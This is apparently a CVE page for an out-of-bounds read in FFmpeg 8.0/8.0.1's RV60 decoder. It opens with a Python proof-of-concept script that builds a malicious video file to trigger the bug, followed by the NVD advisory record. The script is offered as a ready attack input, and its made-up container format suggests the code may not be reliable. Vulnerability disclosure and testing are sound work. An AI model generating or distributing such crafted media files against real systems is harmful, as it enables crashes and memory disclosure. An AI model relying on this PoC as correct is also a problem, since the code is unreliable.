CVE-2025-69693

import struct def create_malicious_rv60(): """Generate PoC for CVE-2025-69693 - FFmpeg RV60 qp validation bypass""" # RV60 frame header structure header = bytearray() # Frame type: Intra frame (1) or Inter frame (0) frame_type = 0x00 # Inter frame - bypasses previous partial fix # 6-bit base qp value (0-63 valid, set to max to trigger overflow) base_qp = 0x3F # 63 in 6 bits # QP offset field (adds +1 to +2 to base qp) qp_offset = 0x02 # This makes effective qp = 63 + 2 = 65 (> 64) # Construct malicious frame header header_byte = (base_qp & 0x3F) | ((qp_offset & 0x03) << 6) header.append(header_byte) header.append(frame_type) # Add padding to reach vulnerable code paths header.extend(b'\x00' * 100) # File format: RV60 video container with open('CVE-2025-69693-poc.rv60', 'wb') as f: # RV60 container header f.write(b'RV60') # Magic number f.write(struct.pack('<I', 1)) # Version f.write(struct.pack('<I', len(header))) # Frame size f.write(header) print(f"PoC file created: CVE-2025-69693-poc.rv60") print(f"QP value will be: {base_qp} + {qp_offset} = {base_qp + qp_offset}") print(f"Array size: 64, causing out-of-bounds access at index {base_qp + qp_offset}") if __name__ == '__main__': create_malicious_rv60() print("\nUsage: Process this file with FFmpeg 8.0/8.0.1 to trigger vulnerability")

{"cve": {"id": "CVE-2025-69693", "sourceIdentifier": "[email protected]", "published": "2026-03-16T20:16:15.060", "lastModified": "2026-03-19T14:19:12.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds read in FFmpeg 8.0 and 8.0.1 RV60 video decoder (libavcodec/rv60dec.c). The quantization parameter (qp) validation at line 2267 only checks the lower bound (qp < 0) but is missing upper bound validation. The qp value can reach 65 (base value 63 from 6-bit frame header + offset +2 from read_qp_offset) while the rv60_qp_to_idx array has size 64 (valid indices 0-63). This results in out-of-bounds array access at lines 1554 (decode_cbp8), 1655 (decode_cbp16), and 1419/1421 (get_c4x4_set), potentially leading to memory disclosure or crash. A previous fix in commit 61cbcaf93f added validation only for intra frames. This vulnerability affects the released versions 8.0 (released 2025-08-22) and 8.0.1 (released 2025-11-20) and is fixed in git master commit 8abeb879df which will be included in FFmpeg 8.1."}, {"lang": "es", "value": "Lectura fuera de límites en el decodificador de video RV60 de FFmpeg 8.0 y 8.0.1 (libavcodec/rv60dec.c). La validación del parámetro de cuantificación (qp) en la línea 2267 solo verifica el límite inferior (qp &lt; 0) pero carece de validación del límite superior. El valor de qp puede alcanzar 65 (valor base 63 del encabezado de trama de 6 bits + desplazamiento +2 de read_qp_offset) mientras que el array rv60_qp_to_idx tiene un tamaño de 64 (índices válidos 0-63). Esto resulta en acceso a array fuera de límites en las líneas 1554 (decode_cbp8), 1655 (decode_cbp16) y 1419/1421 (get_c4x4_set), lo que podría llevar a la divulgación de memoria o a un fallo. Una corrección anterior en el commit 61cbcaf93f añadió validación solo para fotogramas intra. Esta vulnerabilidad afecta a las versiones publicadas 8.0 (publicada el 22-08-2025) y 8.0.1 (publicada el 20-11-2025) y está corregida en el commit maestro de git 8abeb879df que se incluirá en FFmpeg 8.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ffmpeg:ffmpeg:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "E3BC8327-6529-4B32-B7AF-FCAB3BDF8B42"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ffmpeg:ffmpeg:8.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "7F5CACA2-6FB6-4D6D-92D0-C9FF0E7CDB14"}]}]}], "references": [{"url": "https://github.com/FFmpeg/FFmpeg/commit/8abeb879df66ea8d27ce1735925ced5a30813de4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/FFmpeg/FFmpeg/releases/tag/n8.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/FFmpeg/FFmpeg/releases/tag/n8.0.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}]}}